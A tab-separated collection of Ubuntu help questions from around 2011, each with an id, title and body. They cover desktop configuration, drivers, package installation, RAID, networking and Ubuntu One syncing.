75352	how to request a package upgrade in the next ubuntu release	i 'm looking to move our company from fedora 13 to the upcoming 12.04 . we 've built custom hdf5 1.8.7 rpms that are newer than the 1.8.4 version in 12.04 . if we go to 12.04 i 'd like it to have the latest hdf5 library so i do n't need to package it ourselves . how do i request an upgrade to the package ? i looked at ubuntudevelopment and reportingbugs but i did n't see anything specific . would reporting a bug on launchpad be appropriate ?
75353	icon theme does n't change in e17	i just installed enlightment ( e17 ) and trying to change the icon theme does n't seem to do anything , i also have lxde installed and i 'm trying to change the icons from the lxappeareance application but it does n't do anything . how can i make e17 use the icons i want ? , it keeps using the gnome defualt icons .
75357	replacing default hibernate method to s2disk	i have installed uswsusp module with 'sudo apt-get install uswsusp ' . now i am trying to replace the default hibernate method ( as launched from the menu ) with s2disk . i found information that i am to edit this file : /usr/lib/hal/scripts/linux/hal-system-power-suspend-linux unfortunately the path '/usr/lib/hal ' does not exist in my system . also , the directory '/etc/pm/config.d/ ' exists , but is empty , and creating there a file '00_sleep-module ' did not help . please help .
75358	how do i get my usb keyboard to not freeze up in the recovery menu ?	i am using ubuntu 11.10 , and whenever i enter the recovery menu , my keyboard freezes and i ca n't make any selections . i have tried using grub_preload_modules= '' usb usb_keyboard '' but this does n't help at all . the keyboard works in the bios screen and in grub ( i can select an os , write to the command line , etc . ) but as soon as i get to the recovery menu it stops working . if i had the numlock on it will stay lit and i can not turn it off , if that helps
75359	how to get two-finger scolling to work ?	always wanted this feature but it never works in ubuntu . is there any hack/mod to get it to work ? my laptop is an acer 5532 , and my touchpad is from synaptics . the latest drivers from synaptics made two-finger scolling possible with windos 7 , so i 'm guessing there 's some way to work in ubuntu/linux .
75361	how to enable wobbly windows with optimus graphics ?	i installed ubuntu 11.10 on a brand new lenovo thinkpad w520 , but no matter what i tried to do to enable wobbly windows , the setting would n't take effect .
75366	android ubuntu one sync changes back	can i sync changes from my android to u1 and therefore back to my pc . i am hoping to sync my keepass database between my pc and phone . if i subscribe to a site through my phone , i 'd like to have those changes back to my pc from my phone .
75367	login sound disappeared	i 'm using ubuntu 11.10 with gnome shell . and i find that the music after login just disappeared . i run gnome-session-properties in terminal and i can see gnome login sound selected .
75368	how many instructions can be stuffed into iptables without loosing system sanity ?	say one wishes to have a list of blocked ip addresses . i have seen the following example script : blockdb= '' /path/to/ip.blocked.file '' # omit comments lines ips= $ ( grep -ev `` ^ # '' $ blockdb ) for i in $ ips do iptables -a input -s $ i -j drop iptables -a output -d $ i -j drop done is several thousand lines , which transform into several thousand iptables entries , sane ? what is the top limit , beyond which , system efficiency will gets significantly affected ?
75370	unable to use or install the wacom bamboo tablet	i am trying to install wacom driver in ubuntu 11.10 . i am unable to install it as the driver is only available for gnome 2. : (
75371	how to display lyrics of songs ?	when i was using windows , i had an application called minilyrics which let me display the lyrics of the music files played . the application automatically downloads the lyrics and plays along with the song . is there a similar application in ubuntu that i could use ?
75372	`` permission denied '' when starting binary despite `` rwx '' priviledge	i am trying to run the statistics software stata 11 on ubuntu 11.10. as a regular user and i get the following error message : bash : xstata : permission denied the user priviledges seem ok to me as a linux newbie , tough : -rwxr-x -- x 1 root root 16177752 2009-08-27 16:29 xstata* i would very much appreciate some advice on how to resolve this issue !
75373	how to re-enable banshee icon in the older notification area ?	i want to have the original banshee tray icon back . how can i manage this ? the systray-whitelist is already set to [ 'all ' ] , but without success . all solutions i tried are workarounds and do n't provide me the possibility to rate songs when the application is not in the foreground .
75377	how can i encrypt data in ubuntu one or dropbox ?	i 'd love to use ubuntu one or dropbox features , like file storage and so on , but i do n't want anyone else to access my data , usa patriot act etc.. i want things to be encrypted so that the only place where info is decrypted is only my devices . is that possible with ubuntu one or dropbox ?
75382	unable to browse internet web pages while downloading/updating packages/softwares	i am , new to ubuntu and need some help.i 've ubuntu 11.10 installed and enjoying its swift features.but , when the system is downloading some software ( from web links ) or software updates ( update manager ) , the web pages stops ( irrespective of the web browser- google chrome/firefox ) .i can not browse the web during this download.the web page says to `` reload '' later.once download is complete everything is back to normal . i would really appreciate some guidance to overcome this hurdle . thanks in advance . good day deepu
75383	how to install llvmpipe ?	i hear about the llvmpipe gallium 3d state tracker that is said to be faster than software renderer . but i can not find a good instruction from a to z that tell me how to install it . so here i am , asking you all how to install/compile llvmpipe and use it as default opengl renderer . i 'm using a desktop with only a via igp using the openchrome driver which is not really great with opengl .
75388	how do i restore my ubuntu one account ?	i went into `` ubuntu one preferences '' , then went under the `` devices '' tab , then clicked the `` remove '' button . i want to change my decision and restore my ubuntu one account on this computer . i tried un-installing and re-installing ubuntu one via the ubuntu software center and that did n't seem to do anything . i am running ubuntu 10.10 32-bit if that helps to know . thank you ! ~ tom
75393	is there a keyboard shortcut to toggle tree view / places view ?	i find both the tree view and the places view useful . changing from one view to the other is not fast because one have to go into the appearance menu . it 's even slower with oneiric because this menu can now be far away . ( before unity , i always had the tree view on and i used my bookmarks directly from the places menu . that was fine ) is there a keyboard shortcut to toggle from one view to the other ? or is it possible to create one oneself ? thanks a lot the help !
75395	poor sound quality on ubuntu	on ubuntu ( every version i tried since about ~2009 or 2008 ) , the sound quality is noticeably different than on windows xp , regardless of what program i use for playback ( youtube , listening to mp3s , spotify , etc . ) the sound is clearly worse and less natural on ubuntu : my laptop sounds somewhat like a tin can ( for lack of a better way to describe it ) , and when the volume gets even moderately high , the laptop case starts to resonate ( which is just awful , and never happens on windows xp , not even at the highest volume ) . please note -- -this is not a subjective quality difference : the laptop case will resonate on ubuntu as soon as the volume gets turned up to mid-level . it does not on windows even at maximum volume . some extra info about my setup the computer is a dell inspiron 6000 , with `` sigmatel c major audio '' sound . on windows i 'm using the default drivers from dell , i did n't modify any settings , and i checked that no extra sound processing is enabled ( e.g . 3d or bass boost or whatever that 's available on some computers ) . on ubuntu 11.10 i 'm also using the defaults . there 's no noticeable difference in the sound volume of ubuntu and winxp . questions why is there a difference in sound quality ? does n't the audio data that is sent by programs get `` rendered '' to speakers as-is ? is there some extra processing , perhaps to compensate for the characteristics of the speakers or laptop case , akin to colour-management ? what can i do to fix this , and make ubuntu sound as natural as windows xp on my laptop ?
75398	dell vostro 3300 wi-fi led not working	i have a dell vostro 3300 which i use as a dual-boot . all the leds work perfectly fine on windows 7 but the wi-fi led does not work on ubuntu 11.10 . there is a bluetooth led which works perfectly fine . i tried installing the proprietary broadcom wireless driver , it did not help either . vostro-3300 : ~ $ lspci -vnn | grep 14e4 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) and the second output is : lsmod | grep brcmsmac brcmsmac 631693 0 brcmutil 17837 1 brcmsmac mac80211 310872 1 brcmsmac cfg80211 199587 2 brcmsmac , mac80211 crc_ccitt 12667 1 brcmsmac any ideas ?
75399	how do i change the behavior of the nautilus popup search box ?	nautilus has a specific function , which name i do n't know , but the behavior is : typing a symbol from the keyboard opens a small box on the lower right part of the window and selects the first relevant file or folder in the current folder in the window typing more symbols selects the relevant file or folder or no selection if the searched string does n't exist in the current folder . the backspace key deletes the last symbol used and again selects the appropriate file or folder . now this was in ubuntu natty 11.04 , in oneiric 11.10 the behavior is like in the following : typing a symbol selects relevant file/folder , i.e . same as in natty . typing more symbols ... - the same as in natty backspace opens the upper directory in the tree and the small search box in lower right corner stays with the last searched string . typing anything from the keyboard adds more to that string even in the new folder and the only way to search from the beginning is to select the string /with the mouse/ and delete it with del button /backspace returns in upper folder in the tree/ and type again to search . not very user friendly and very annoying : - ) now , what should i do ? is there any work around and how can i appropriately file this as a bug ?
75400	increase resolution for multiple displays above graphics card resolution ?	i have a monitor with a default resolution of 1920x1080 and have it set up with a second monitor with a default res of 1280x1024 . however , my graphics card ( ati 2900pro ) states its max res to be 2560x1600 , and ubuntu will not allow both displays combined to exceed this resolution . is this likely to be hardware limited ? or can this maximum resolution be overridden in ubuntu somewhere ? *edit - further info requested . i have the proprietary ati ccc ( and drivers ) installed , but this does not allow me to configure the resolution . i am configuring the resolution using the displays control panel in ubuntu . i have also tried manually editing the xorg.conf . however , whatever i do the system seems to realise that my card only supports the lower resolution and it ends up overlapping the two displays till they meet that resolution .
75401	problem installing netbeans 7.0.1	i downloaded netbeans 7.0.1 from netbeans.com for linux , but i could n't open it , i tried many applications but it did n't work , why ? it says it 's not supported and some times it gives me errors , netbeans downloaded file look like this : netbeans-7.0.1-ml-php-linux.sh how i 'm supposed to open and install it on my linux machine ?
75404	downloading and installing error : package is not a debian format archive	i 'm a newbie to linux and ubuntu , and i 'm trying to install a package called libstdc++2.10-glibc2.2 i first use wget wget http : //packages.ubuntu.com/dapper/libstdc++2.10-glibc2.2 it gives me saving to libstdc++2.10-glibc2.2.4 so it adds an extra .4 at the end . then i do sudo dpkg -i libstdc++2.10-glibc2.2.4 and it gives me dpkg-deb : error : `libstdc++2.10-glibc2.2.4 ' is not a debian format archive dpkg : error processing libstdc++2.10-glibc2.2.4 ( -- install ) : subprocess dpkg-deb -- control returned error exit status 2 errors were encountered while processing : libstdc++2.10-glibc2.2.4 what am i doing wrong ?
75414	ubuntu one - stuck at loading	just installed ubuntu one on brand new 11.10 . when i open the control panel it stays loading ... and wo n't let me access my account , devices and folders . it states my files are synced , though . ubuntu one is in italian . opening from windows everything is ok . thanks in advance for your help fabrizio
75421	how can i set up a filter in synaptic that finds all packages not installed from official repositories ?	the custom filter options in synaptic are kind of cryptic to me . i know over the last year and a half ( i have n't fresh-installed since 10.04 ) i 've installed several .debs and packages from ppas . how can i set up a filter in synaptic that finds just these packages , so that i can downgrade or remove them ?
75427	using init 0 to shutdown computer	okay so i have ubuntu 10.10 and for some reason if i shutdown with the shutdown button in the top corner under power or shutdown -h now or shutdown now these things end up restarting my computer . will it damage my computer like the hardware , operating system , etc if i use sudo init 0 to shutdown all the time , because that shudown ( restart ) crap makes my windows to start acting strange after a few times and i think it could end up damaging my hardware so i have decided to use init 0 instead . let me know thanks ! i really do n't like unity ( 11.04 ) or gnome3 ( 11.10 ) so id rather stay at 10.10 i am enjoying it !
75430	laptop wo n't connect to ethernet after configuring it for broadband bsnl	i recently went to india and over there i had to configure my laptop to use broadband internet . so i followed a guide similar to this one . everything worked fine and i was able to get online , however , when i came back to states my ethernet connection does not work anymore . when i simply plug-in the ethernet cable , the light blinks but nothing happens on the laptop . my wireless still works . is there a way to reset my ethernet settings back as they were when i first installed ubuntu so that everything works as desired ?
75435	how can i change places under 'computer ' in nautilus	in nautilus side pane ( places view ) , you have the sections 'bookmarks ' , 'computer ' and 'network ' . i cant rename or remove any entries in 'computer ' . i have all my music / documents etc on my nas and not locally under my 'home ' . how can i get rid of those entries ? ps . i 'm running gnome3 on ubuntun 11.10 and it 's just sweet ; - )
75436	wireless internet connectivity not detected	i have a lenovo laptop ( 2.1 ghz , 2 gb ram , 500 gb hard ) with windows 7 ultimate . i installed ubuntu 11.10 today . when i restarted it quickly gave a message `` error file ... '' and then ubuntu started . i have a wifi internet connection which is detected by windows 7 but ubuntu does not detect it . when i try to select `` enable wireless '' from networking menu , nothing happens , it is never selected despite repeated clicks . if i try to add a wireless connection through `` edit connections '' at the bottom of the menu , the save button never gets enabled in the window regardless whatever i do . i reinstalled ubuntu after uninstalling it but the problem persists . please give the solution in simple language because i am not into computer language .
75445	change the sort order of devices in nautilus	i have three windows drive , my nautilus shows devices in following order i want it to be sorted like windows 7 does c drive d drive e drive my massport 13 gb fs future attached removable mediums ... . list item
75449	problem with lightdm after selecting gdm as default login manager	i installed gnome 3 on ubuntu 11.10 and in the install process i chose gdm as the login screen . i want to switch back to lightdm . i ran sudo dpkg-reconfigure gdm and chose lightdm but it gives me a black screen when i restart . help please
75454	how do i install ubuntu-tweak ?	i have heard a lot about ubuntu-tweak and how it is great for power users , but i do n't know how to install it . how do i do that ?
75455	how do i fine-tune user privileges ?	in previous versions of ubuntu , i was able to fine-tune user privileges easily via a tool . however , the present version apparently only allows two levels : standard or administrator . how do i e.g . give a standard user rights to connect to wireless networks ?
75457	how do i reactivate the unity hotkeys ?	after some reboots ( 2-4 ) most of the hot-keys do n't work any longer . hot-keys such as : super + w , super + a , super + f , super + f1 , super + f2 no longer work , but : super + 1 ... , super + t , super + s are working fine .
75465	where did the menu bars from my applications go in gnome shell ?	i 'm running ubuntu 11.10 , and all the menu-bars ( file , options , etc ) from applications like gedit & co are gone . for some applications that is not a problem , because there are still icons i can click on , but for other applications i need to access their menu bar . so how can i get the menu-bars back ? edit : i 'm using gnome-shell not unity .
75470	how to make tail -f show time when line was appended ?	i 'd like to know the time when line was appended when file is being tail -f'ed . is it possible to configure tail to do something like that ?
75474	my battery is not charging after power outage	i just emerged from 6 days power outage and now my msi u100 is not charging the battery . clicking on the battery indicator says 0 % in spite of having been plugged in for 30+ minutes . if i unplug it , the machine turns off . if i run : cat /proc/acpi/battery/bat1/state i get back ... present : yes capacity state : ok charging state : charged present rate : 0 ma remaining capacity : 0 mah present voltage : 8492 mv perhaps i fried the charging circuit when the power came back on ... any help is appreciated .
75475	how do i run ubuntu 11.10 from a pendrive with an acer bios ?	my bios just `` freezes '' if a try to boot from a pendrive and i have to remove the battery to restart ... : ( does it have a solution ? i 'm trying to make a clean 11.10 installation , i already have windows 7 and ubuntu 11.04 running in the same hdd on different partitions , not via wubi . i think the bios name is `` phoenix '' . my notebook is an acer aspire 5520-5688 . i was thinking about making a clean installation directly in the 11.04 partition , but i do n't know if it is possible . any help is appreciated .
75478	how can i see what version of amd catalyst is in the `` additional drivers ''	how can i see what version of amd catalyst is in the `` additional drivers '' ? i know that now it 's 11.8 , but it does not work with my hd 6320 graphics chip in the amd e-450 apu . it is not possible to see what version is in the `` additional drivers '' before installing it . it seems that catalyst 11.10 has better support for 6320 , but how do i find out when it will be in ubuntu repositories ?
75479	arrange icons on unity 2d bar	i ca n't arrange icons on 2d unity bar . whenever i 'm trying to drag icons whole bar dragged up and down instead ! i can only remove and add app icons to bar , but they always added at end , just before workspaces icon . is there any nice way to reorganize icons except wiping all icons from unity bar and re-adding them in desired order ?
75483	migrate ftp users from one server to another	i have a situation where i have ~10 ftp users , and i need to migrate them from one server ( server a ) to another ( server b ) . the userdata ( so their files ) are in /home/ < username > , so moving that is as simple as an rsync job . i also need to keep their existing usernames/passwords etc - if it 's at all possible , the users should n't notice that they had the server switched on them . is there a `` easy '' way to do this ?
75490	after downloading my usb adapter driver zipped file , how can i install it ( after extracting )	i just downloaded my alfa awus036h wireless usb driver for my linux machine , but i have no clue about installing it on my machine , how can i do that ? please help me..
75495	libc6-dev unmet dependency	i am trying to install libc6-dev on a fresh installation of ubuntu 10.04-server . apt-get reports the following error : the following packages have unmet dependencies : libc6-dev : depends : libc6 ( =2.11.1-0ubuntu7.6 ) but 2.11.1-0ubuntu7.8 is to be installed ) i just did this install on an identical machine , with the same ubuntu mirror , and it did not have this problem . i do n't understand what the difference could be . how can i get around this ?
75502	rfkill block bluetooth disables wifi too ?	i have a dell n4110 system . i want to disable bluetooth on the system and hence i used the command sudo rfkill block bluetooth . but when i checked the list , i see that my wifi has been hard blocked too . moreover , i noticed that the index for the devices on rfkill list changes after each reboot . here is a screenshot of the issue : how can i disable only the bluetooth ?
75504	nautilus freezes if mounted sshfs-device is unreachable	using sshfs to mount remote file systems in the user space , i have the problem that all instances of nautilus use to freeze , if one of the mounted hosts is unreachable . that problem occurs with nautilus 2.x and 3.x and i cant find any solution until today . this problem makes sshfs almost unusable , at least using an unstable wlan or something like it . is this a nautilus bug ? can anyone confirm this problem , is there a solution ?
75505	how do i stop that launcher from popping up when mouse goes to the left edge ?	this is what it says on the help.ubuntu.com website , but when i go to system settings , it does not have a launcher & menus option . i wish i could revert back to the old ubuntu , i hate this launcher . does any know a fix plz ? `` stop the launcher from showing when i point to the left side of the screen the launcher unhides when you move your mouse or touchpad pointer to the left side of the screen . if you prefer , you can tell unity to only show the launcher when you click the top left ubuntu button instead . click the icon at the very right of the top bar and select system settings . in the personal section , click launcher & menus . choose touches the top left corner of the screen ''
75507	raid wo n't mount on boot after reinstall	so i was having a lot of trouble with ubuntu after upgrading to 11.10 . i decided to do a clean install , and things seem to be much better . however , i am unable to get my raid to mount after installing mdadm . i 'm able to go to /media , and then mount it , but it used to mount on boot . trying to edit fstab , but when i fdisk -l , i 'm getting disk /dev/md127 does n't have a valid partition table . when i made the array , i gave it a .ext4 partition table , and thought it was taken care of . please help ! if i run .ext4 again , i do n't want it to erase the data currently on the array . sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 80.0 gb , 80025280000 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156299375 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 156299374 78149687 ee gpt disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000412f6 device boot start end blocks id system /dev/sdb1 63 3907024064 1953512001 fd linux raid autodetect disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005cf54 device boot start end blocks id system /dev/sdc1 63 3907024064 1953512001 fd linux raid autodetect disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a563b device boot start end blocks id system /dev/sdd1 63 3907024064 1953512001 fd linux raid autodetect disk /dev/sde : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00088e1f device boot start end blocks id system /dev/sde1 63 3907024064 1953512001 fd linux raid autodetect disk /dev/sdf : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a104e device boot start end blocks id system /dev/sdf1 63 3907024064 1953512001 fd linux raid autodetect disk /dev/sdg : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000271fa device boot start end blocks id system /dev/sdg1 63 3907024064 1953512001 fd linux raid autodetect disk /dev/md127 : 10002.0 gb , 10001973248000 bytes 2 heads , 4 sectors/track , -1853079296 cylinders , total 19535104000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 1048576 bytes / 5242880 bytes disk identifier : 0x00000000 disk /dev/md127 does n't contain a valid partition table
75516	in 10.04 there is /var/log/messages and /var/log/syslog	both these files are present in ubuntu 10.04 yet they seem to contain different information . what 's the difference between these two files ?
75518	linking multiple sounds cards in order to play sound over all of them simultaneously .	i have been searching for a way to utilize multiple sound cards to play the same audio at the same time . my laptop has ubuntu 11.10 x64 ( 3.0.0-12 ) w. alsa 1.0.24 . i have a pair of usb speakers that i have purchased and would like to be able to use them as well as my internal speakers . the internal speakers and usb speakers are two separate soundcards : aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc275 analog [ alc275 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc275 digital [ alc275 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : audio [ usb audio ] , device 0 : usb audio [ usb audio ] subdevices : 0/1 subdevice # 0 : subdevice # 0 i would like to use cards 0 and 2 ( intel and usb ) i was hoping that there would be a way to create a link between the two , so that it 's a system-level fix , versus having to set up each application to handle it correctly . i am not sure if alsa can handle this , and if not , if there would be a solution within my linux environment to solve my problem .
75522	is there a configuration utility for an intel embedded graphics card ?	i would like to change some settings of my intel g41 embedded graphics card using an application , like i can do in windows or with nvidia or amd in linux . is there something like that for intel in ubuntu-linux ?
75527	in gnome shell , how do i select an application using the keyboard ?	using gnome shell , i 'll press the super key to bring up the search box in order to search for a program to use . once the program has come up , or , once i 've selected the program using the keyboard directional buttons , how do i open the program ? pressing enter once the program is selected does n't open it . what do i press , or where can i configure it , so that the program opens when pressing enter , or another key ?
75530	how to install gnome shell extensions	how do i install gnome shell extensions ?
75536	ftp error - filezilla crash when drag and drop a file	i am having issues both with filezilla and with gftp . basically , when i attempt an upload or a download , filezilla just crashes and closes down , while gftp sometimes says it can not open the destination folder although what i 'm trying to upload is a file . any suggestion on how to solve this ? i 'm using ubuntu 11.10
75540	can i install ubuntu on a laptop as a vm host for various vm guests ?	given the following requirements and constraints : purpose : light-weight vm host for local windows ( desktop and server ) and linux guests . host os needs to be hardware compatible with dell inspiron 17r - n7110 intel core i3-2310m ( 2.10 ghz ) 640 gb sata ii hdd 6 gb ddr3 sdram intel centrino wireless-n 1030 integrated intel hd graphics 3000 ( up to 1.6 gb dynamic video memory ) need to be able to run 2 or 3 vm guests at a time ( 3 would be rare and can live without , if not possible . ) need to have network access from guests through the wireless card in the laptop ( i.e. , i should not have to depend on the wired lan card . ) guests need to be able to access usb storage connected to host ( either directly or as a remote `` share '' . ) sound support for guests would be nice , but not critical . auto-starting a preferred vm at host start up would be nice ( again , not critical . ) which is my best option ? i assume i need 64-bit host os to access all the ram . server or desktop ? gui or not ( i assume so , even though it makes the host `` heavier '' ) ? kvm , vmware , or virtualbox ? can some one help me weigh pros and cons ( or point me to relevant online resources ? ) thank you very kindly , grant lindsay
75542	how do i get my kodak printer to work ?	i have a kodak esp c310 printer that i tried installing on my computer ( ubuntu 10.04 ) , but it would n't even recognize the device . so , i went on the kodak site and talked to a representative online ( after googling and not finding anything helpful ) , and all they told me was that kodak drivers do not support linux or any form of linux , like ubuntu . i asked them if they ever would , and the person told me they were working on it . well , that does n't help me at all . has anyone been able to work around this problem of kodak not supporting linux ? i do n't want my printer to go waste , i need it . thanks !
75548	is it possible to move between desktops with mouse wheel ?	is it possible to move between desktops with mouse wheel in 11.10 ? i could do this in earlier versions using ccsm but that does n't seem to work in 11.10 thanks in advance . bob .
75549	how do i install netbeans ?	i used netbeans for java development on windows and remember fidning it in the ubuntu software center on natty , but now it 's gone . is there a ppa i can use or will it be re-added to the official repos ?
75554	sharkoon 5-bay raid box , will it play ?	i 'm looking to expand the storage capacity of my home server running on ubuntu server edition . because the server is a small sized mini-itx cube with room for only 1 hdd , i had the idea of installing the os disk in the server and attach n external hard disks as 1 large logical volume with usb3 . so i started looking around for external drive bays that could hold more than 1 disk and this http : //www.sharkoon.com/ ? q=en/node/1809 system caught my eye . however , the product information only says that the system is compatible with windows . it also provides details about the chipset used , being jmicron jmb393 and jmb 539 . the jmicron website faq says the chipset is compatible with linux but i would like to be 100 % sure before purchasing .
75556	ubuntu one contacts not syncing ?	with the 11.10 update , i discovered an `` ubuntu one '' address book in my thunderbird address books . exciting ! but ... it does n't seem to be syncing . i 've got `` enable contacts sync '' checked in ubuntu one 's control panel and i 'm able to add addresses to the new `` ubuntu one '' address book , but they do n't seem to leave my laptop . i do n't see any way to troubleshoot this within thunderbird or ubuntuone .
75558	toggle fullscreen mode does n't work in 11.10 ?	according to 'system settings → keyboard → shortcuts → windows → toggle fullscreen mode ' i can use alt+f10 to toggle fullscreen mode of a window . in previous versions of ubuntu this worked just fine , is this a known bug in unity ?
75562	duplicate ping response when running ubuntu as virtual machine ( vmware )	i have the following setup : my router - 192.168.0.1 my host computer ( windows 7 ) - 192.168.0.3 and ubuntu is running as virtual machine on the host . vmware network settings is bridged mode . i 've modified ubuntu network settings in /etc/netowrk/interfaces , set the following config : iface eth0 inet static address 192.168.0.220 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 internet works correctly , i can install packages . but it gets weird if i try to ping something i get this : ping belpak.by ( 193.232.248.80 ) 56 ( 84 ) bytes of data . from 192.168.0.1 icmp_seq=1 time to live exceeded from 192.168.0.1 icmp_seq=1 time to live exceeded from 192.168.0.1 icmp_seq=1 time to live exceeded from 192.168.0.1 icmp_seq=1 time to live exceeded from 192.168.0.1 icmp_seq=1 time to live exceeded 64 bytes from belhost.by ( 193.232.248.80 ) : icmp_seq=1 ttl=250 time=17.0 ms 64 bytes from belhost.by ( 193.232.248.80 ) : icmp_seq=1 ttl=249 time=17.0 ms ( dup ! ) 64 bytes from belhost.by ( 193.232.248.80 ) : icmp_seq=1 ttl=248 time=17.0 ms ( dup ! ) 64 bytes from belhost.by ( 193.232.248.80 ) : icmp_seq=1 ttl=247 time=17.0 ms ( dup ! ) 64 bytes from belhost.by ( 193.232.248.80 ) : icmp_seq=1 ttl=246 time=17.0 ms ( dup ! ) ^cfrom 192.168.0.1 icmp_seq=2 time to live exceeded -- - belpak.by ping statistics -- - 2 packets transmitted , 1 received , +4 duplicates , +6 errors , 50 % packet loss , ti me 999ms rtt min/avg/max/mdev = 17.023/17.041/17.048/0.117 ms i think even more interesting are the results of pinging the router itself : stonerain @ ubuntu : ~ $ ping 192.168.0.1 -c 1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . from 192.168.0.3 : icmp_seq=1 redirect network ( new nexthop : 192.168.0.1 ) 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=254 time=6.64 ms -- - 192.168.0.1 ping statistics -- - 1 packets transmitted , 1 received , 0 % packet loss , time 0ms rtt min/avg/max/mdev = 6.644/6.644/6.644/0.000 ms but if i set -c 2 : ... 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=252 time=13.5 ms ( dup ! ) 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=251 time=13.5 ms ( dup ! ) 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=254 time=13.5 ms ( dup ! ) 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=253 time=13.5 ms ( dup ! ) 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=252 time=13.5 ms ( dup ! ) 64 bytes from 192.168.0.1 : icmp_seq=1 ttl=251 time=13.5 ms ( dup ! ) from 192.168.0.3 : icmp_seq=2 redirect network ( new nexthop : 192.168.0.1 ) 64 bytes from 192.168.0.1 : icmp_seq=2 ttl=254 time=7.87 ms -- - 192.168.0.1 ping statistics -- - 2 packets transmitted , 2 received , +256 duplicates , 0 % packet loss , time 1002ms rtt min/avg/max/mdev = 6.666/10.141/13.556/2.410 ms pinging host machine on the other hand works absolutely correctly : no dups , no errors . what seems to be the problem and how can i fix it ? thank you .
75565	why am i getting authentication errors for packages from an ubuntu repository ?	i 'm experimenting with vpns , so i wanted to install pptpd . john @ desktop : ~ $ sudo apt-get install pptpd [ sudo ] password for john : < snip > the following extra packages will be installed : bcrelay the following new packages will be installed : bcrelay pptpd 0 upgraded , 2 newly installed , 0 to remove and 11 not upgraded . need to get 90.5 kb of archives . after this operation , 442 kb of additional disk space will be used . do you want to continue [ y/n ] ? y and everything runs fine until i get down to here : warning : the following packages can not be authenticated ! bcrelay pptpd install these packages without verification [ y/n ] ? n e : some packages could not be authenticated no authentication ? i 'm no security expert , but i 'm fairly sure that 's a bad thing . so i check to see where the packages are coming from . john @ desktop : ~ $ apt-cache policy pptpd pptpd : installed : ( none ) candidate : 1.3.4-3ubuntu1 version table : 1.3.4-3ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/main i386 packages john @ desktop : ~ $ apt-cache policy bcrelay bcrelay : installed : ( none ) candidate : 1.3.4-3ubuntu1 version table : 1.3.4-3ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/main i386 packages they 're coming from ubuntu.com and not being properly authenticated ? what 's going on here ?
